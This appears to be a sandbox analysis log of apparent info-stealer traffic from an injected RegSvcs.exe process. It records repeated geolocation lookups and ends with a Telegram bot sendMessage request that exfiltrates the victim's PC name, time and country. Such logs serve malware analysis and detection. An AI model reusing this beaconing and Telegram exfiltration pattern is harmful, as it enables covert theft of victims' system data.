                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1566&min_rtt=1550&rtt_var=614&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1737061&cwnd=213&unsent_bytes=0&cid=91828614e4aa127d&ts=436&x=0"
                                                                                                  2025-01-08 14:44:23 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  11192.168.2.549766188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:23 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:24 UTC853INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:23 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662253
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=k8Vt%2FgeE6hX9GMrxODaoT05Vp2u43tDL3oIcY3lvrXnAmmXsPbYGVDWc%2FwS10FgheWxo5dIQVrJ5VXQVRPNqeOXEGSiPfmvHAxfLpHC0ofNTYJUJaW0SsyGrqScA15fcf3AgVy34"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf721af6772aa-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1959&min_rtt=1952&rtt_var=747&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1450571&cwnd=191&unsent_bytes=0&cid=05b365fda0fdd1de&ts=156&x=0"
                                                                                                  2025-01-08 14:44:24 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  12192.168.2.549778188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:25 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:25 UTC861INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:25 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662254
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=F%2FvlKLng%2FTf2IYQciARb4eJz61M8ttx1tqtPfZ8cvmxnThtVgVj27LB891LlFKtSY%2FNYHnW6Zpae7%2FX81NLwVmCDTZF%2FyUIqGkZLcQk1C%2FBFKgUVhbpZVgYIgfl0cqQW2tb7oN30"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf72a4fc8ef9f-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2031&min_rtt=2017&rtt_var=766&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1447694&cwnd=219&unsent_bytes=0&cid=840d545387ecf593&ts=206&x=0"
                                                                                                  2025-01-08 14:44:25 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  13192.168.2.549789188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:26 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:26 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:26 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662255
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3sowbZamt2OljV09jEYxJ2pE4dtuhK%2FqTVUli8jNtcNbx%2BdzQDF05IHWDPrpbxAlibg4XU0RMsJX88%2BvRkMkr0vRp%2B4Pby%2FdKL3Zrfdw6l9VyRidJ4ZjpT7ug7DndxyzkTiiwMuN"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf732bc7118f2-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1617&min_rtt=1615&rtt_var=610&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1785932&cwnd=232&unsent_bytes=0&cid=d95363705391645b&ts=150&x=0"
                                                                                                  2025-01-08 14:44:26 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  14192.168.2.549801188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:27 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:28 UTC861INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:28 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662257
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HwRgC%2FLgIV6n1CglVCUUnt81tiAEvyGdHDy5ScjMDsbjPdkP7wMs44UuNMTlFJn7J%2Fthf%2FDslnWmFGrjUgPeTkI7IT2fxSESr%2B29MMTgA8f%2Fa%2FTBe9wlRavX3YKTbGbdIqL54Kqf"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf73b0af04288-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1633&min_rtt=1626&rtt_var=624&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1734997&cwnd=246&unsent_bytes=0&cid=52758b41b76b936d&ts=166&x=0"
                                                                                                  2025-01-08 14:44:28 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  15192.168.2.549810188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:29 UTC61OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  2025-01-08 14:44:29 UTC857INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:29 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662258
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=ROp586%2Bp2By6SJO8zxefnNVFtrnIqApRiAuvEBeBALRCy%2FEUBFxNifTnka9D8vOd1hCYWzAGyJD%2F8zWrvb3CIHFvE2lCVGiwIxlKyTC6dNR6CHj7KmVeaAP8PMy7fSx%2BKzFUxytO"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf743482f236a-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2079&min_rtt=2073&rtt_var=790&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1373471&cwnd=170&unsent_bytes=0&cid=9cfb604b98d193e2&ts=161&x=0"
                                                                                                  2025-01-08 14:44:29 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  16192.168.2.549819188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:30 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:30 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:30 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662259
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WYN6yVIsyj3UPJoLZwsRhTjntg6uFxHcxFbL4ClO%2B31yeHXTdZDDb258w0AfPYTDU44OjXMufq7Ne9qDd%2FoSAjbjtrrWGxMx2L4b%2FRQQFZ%2FNrEHITv9sQMPuBVmGXI7ivXK9t04%2F"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf74b6c6f42e1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1764&min_rtt=1760&rtt_var=668&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=699&delivery_rate=1629464&cwnd=234&unsent_bytes=0&cid=d0d159c53e01a284&ts=140&x=0"
                                                                                                  2025-01-08 14:44:30 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  17192.168.2.549830188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:31 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:31 UTC851INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:31 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662261
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HN7pDIakN8nT18rkBarBvp0ya26JVjTsZ1cQPRVajnyBMeGqDDU5ccVM7Ublj5q84UR1FGWoA1mEksp%2F06hppuBW8flSxoIqmIt3TXyGNTNjNlCgZ5keXtaEjyVHkEt5XwmBs9qK"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf7537d2f8c89-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=2001&min_rtt=1991&rtt_var=767&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2847&recv_bytes=699&delivery_rate=1408586&cwnd=202&unsent_bytes=0&cid=10ffe7885c903fb9&ts=150&x=0"
                                                                                                  2025-01-08 14:44:31 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  18192.168.2.549838188.114.96.34435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:33 UTC85OUTGET /xml/8.46.123.189 HTTP/1.1
                                                                                                  Host: reallyfreegeoip.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:33 UTC859INHTTP/1.1 200 OK
                                                                                                  Date: Wed, 08 Jan 2025 14:44:33 GMT
                                                                                                  Content-Type: text/xml
                                                                                                  Content-Length: 362
                                                                                                  Connection: close
                                                                                                  Age: 1662262
                                                                                                  Cache-Control: max-age=31536000
                                                                                                  cf-cache-status: HIT
                                                                                                  last-modified: Fri, 20 Dec 2024 09:00:10 GMT
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=0eb3DfmD%2B%2FCLr4MlW7K1JNABMyQ%2F4ZOwxhXpWPxAlPiXR5mBI82dCrBVZSYEUAyqAaJC24kqAe8wM5w3Doph%2BLffPgFzE9aY0i62sgDd4wq1CVIgeIoeOfqKvyHRZ%2FcXoC6vbYSH"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 8fecf75c7f494393-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1610&min_rtt=1609&rtt_var=606&sent=5&recv=6&lost=0&retrans=0&sent_bytes=2848&recv_bytes=699&delivery_rate=1800246&cwnd=201&unsent_bytes=0&cid=1da1fdcbdacd3c78&ts=160&x=0"
                                                                                                  2025-01-08 14:44:33 UTC362INData Raw: 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 31 38 39 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 4e 59 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 4e 65 77 20 59 6f 72 6b 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 4e 65 77 20 59 6f 72 6b 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 31 30 31 31 38 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 4e 65 77 5f 59 6f 72 6b 3c 2f 54 69 6d 65 5a 6f
                                                                                                  Data Ascii: <Response><IP>8.46.123.189</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>NY</RegionCode><RegionName>New York</RegionName><City>New York</City><ZipCode>10118</ZipCode><TimeZone>America/New_York</TimeZo


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  19192.168.2.549844149.154.167.2204435488C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-08 14:44:34 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:610930%0D%0ADate%20and%20Time:%2008/01/2025%20/%2021:09:38%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20610930%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                                  Host: api.telegram.org
                                                                                                  Connection: Keep-Alive
                                                                                                  2025-01-08 14:44:34 UTC344INHTTP/1.1 404 Not Found
                                                                                                  Server: nginx/1.18.0
                                                                                                  Date: Wed, 08 Jan 2025 14:44:34 GMT
                                                                                                  Content-Type: application/json
                                                                                                  Content-Length: 55
                                                                                                  Connection: close
                                                                                                  Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
